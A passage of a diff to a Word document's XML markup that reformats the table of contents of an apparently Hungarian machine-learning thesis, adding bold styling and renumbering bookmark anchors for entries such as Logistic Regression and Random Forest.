+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1869,6 +1881,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1876,6 +1890,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -1899,7 +1915,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008734" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158198" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -1943,7 +1959,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008734 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158198 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -1989,7 +2005,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008735" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158199" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2035,7 +2051,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008735 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158199 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2081,7 +2097,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008736" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158200" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2125,7 +2141,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008736 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158200 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2171,7 +2187,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008737" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158201" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2215,7 +2231,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008737 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158201 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2262,7 +2278,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008738" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158202" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2306,7 +2322,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008738 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158202 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2353,7 +2369,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008739" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158203" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2399,7 +2415,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008739 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158203 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2440,16 +2456,20 @@
             <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:b/>
+              <w:bCs/>
               <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008740" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158204" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
               </w:rPr>
               <w:t>2.</w:t>
@@ -2457,6 +2477,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
@@ -2467,12 +2489,16 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
               </w:rPr>
               <w:t>GÉPI TANULÁS</w:t>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2480,6 +2506,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2487,19 +2515,25 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008740 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158204 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2507,6 +2541,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2514,6 +2550,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2537,7 +2575,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008741" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158205" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2583,7 +2621,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008741 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158205 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2629,7 +2667,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008742" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158206" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -2675,7 +2713,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008742 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158206 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -2708,35 +2746,26 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TJ2"/>
+            <w:pStyle w:val="TJ3"/>
             <w:tabs>
-              <w:tab w:val="left" w:pos="1100"/>
+              <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
+              <w:rStyle w:val="Hiperhivatkozs"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008743" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158207" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2.2.1.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-                <w:lang w:val="hu-HU"/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2744,46 +2773,46 @@
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Logistic Regression</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008743 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158207 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2791,7 +2820,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
@@ -2800,35 +2829,26 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TJ2"/>
+            <w:pStyle w:val="TJ3"/>
             <w:tabs>
-              <w:tab w:val="left" w:pos="1100"/>
+              <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
+              <w:rStyle w:val="Hiperhivatkozs"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008744" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158208" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2.2.2.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-                <w:lang w:val="hu-HU"/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2836,46 +2856,46 @@
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>K-Nearest Neighbors (K-NN)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008744 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158208 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2883,7 +2903,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
@@ -2892,35 +2912,26 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TJ2"/>
+            <w:pStyle w:val="TJ3"/>
             <w:tabs>
-              <w:tab w:val="left" w:pos="1100"/>
+              <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
+              <w:rStyle w:val="Hiperhivatkozs"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008745" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158209" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2.2.3.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-                <w:lang w:val="hu-HU"/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -2928,46 +2939,46 @@
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Linear Support Vector (LinearSVC)</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008745 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158209 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -2975,7 +2986,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
@@ -2984,35 +2995,26 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TJ2"/>
+            <w:pStyle w:val="TJ3"/>
             <w:tabs>
-              <w:tab w:val="left" w:pos="1100"/>
+              <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
             <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
+              <w:rStyle w:val="Hiperhivatkozs"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008746" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158210" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2.2.4.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-                <w:lang w:val="hu-HU"/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -3020,46 +3022,46 @@
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Gaussian Naive Bayes</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008746 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158210 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3067,7 +3069,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
@@ -3076,36 +3078,27 @@
         </w:p>
         <w:p>
           <w:pPr>
-            <w:pStyle w:val="TJ2"/>
+            <w:pStyle w:val="TJ3"/>
             <w:tabs>
-              <w:tab w:val="left" w:pos="1100"/>
+              <w:tab w:val="left" w:pos="1320"/>
               <w:tab w:val="right" w:leader="dot" w:pos="8493"/>
             </w:tabs>
             <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
-              <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-              <w:noProof/>
-              <w:sz w:val="22"/>
-              <w:szCs w:val="22"/>
-              <w:lang w:val="hu-HU"/>
+              <w:rStyle w:val="Hiperhivatkozs"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008747" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158211" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>2.2.5.</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
-                <w:noProof/>
-                <w:sz w:val="22"/>
-                <w:szCs w:val="22"/>
-                <w:lang w:val="hu-HU"/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
               </w:rPr>
               <w:tab/>
             </w:r>
@@ -3113,46 +3106,46 @@
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
-                <w:lang w:val="hu-HU"/>
               </w:rPr>
               <w:t>Random Forest</w:t>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:tab/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="begin"/>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008747 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158211 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="separate"/>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3160,7 +3153,7 @@
             </w:r>
             <w:r>
               <w:rPr>
-                <w:noProof/>
+                <w:rStyle w:val="Hiperhivatkozs"/>
                 <w:webHidden/>
               </w:rPr>
               <w:fldChar w:fldCharType="end"/>
@@ -3183,7 +3176,7 @@
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008748" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158212" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
@@ -3229,7 +3222,7 @@
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008748 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158212 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
@@ -3270,16 +3263,20 @@
             <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:b/>
+              <w:bCs/>
               <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008749" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158213" w:history="1">
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
               </w:rPr>
               <w:t>3.</w:t>
@@ -3287,6 +3284,8 @@
             <w:r>
               <w:rPr>
                 <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:sz w:val="22"/>
                 <w:szCs w:val="22"/>
@@ -3297,12 +3296,16 @@
             <w:r>
               <w:rPr>
                 <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
               </w:rPr>
               <w:t>PROGRAM FELÉPÍTÉSE</w:t>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3310,6 +3313,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3317,19 +3322,25 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
-              <w:instrText xml:space="preserve"> PAGEREF _Toc72008749 \h </w:instrText>
+              <w:instrText xml:space="preserve"> PAGEREF _Toc72158213 \h </w:instrText>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3337,6 +3348,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3344,6 +3357,8 @@
             </w:r>
             <w:r>
               <w:rPr>
+                <w:b/>
+                <w:bCs/>
                 <w:noProof/>
                 <w:webHidden/>
               </w:rPr>
@@ -3361,19 +3376,133 @@
             <w:spacing w:line="360" w:lineRule="auto"/>
             <w:rPr>
               <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+              <w:b/>
+              <w:bCs/>
               <w:noProof/>
               <w:sz w:val="22"/>
               <w:szCs w:val="22"/>
               <w:lang w:val="hu-HU"/>
             </w:rPr>
           </w:pPr>
-          <w:hyperlink w:anchor="_Toc72008750" w:history="1">
+          <w:hyperlink w:anchor="_Toc72158214" w:history="1">
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>4.</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:sz w:val="22"/>
+                <w:szCs w:val="22"/>
+                <w:lang w:val="hu-HU"/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:rStyle w:val="Hiperhivatkozs"/>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+              </w:rPr>
+              <w:t>EREDMÉNY ÉS ANALÍZIS</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:tab/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
+                <w:webHidden/>
+              </w:rPr>
+              <w:fldChar w:fldCharType="begin"/>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:b/>
+                <w:bCs/>
+                <w:noProof/>
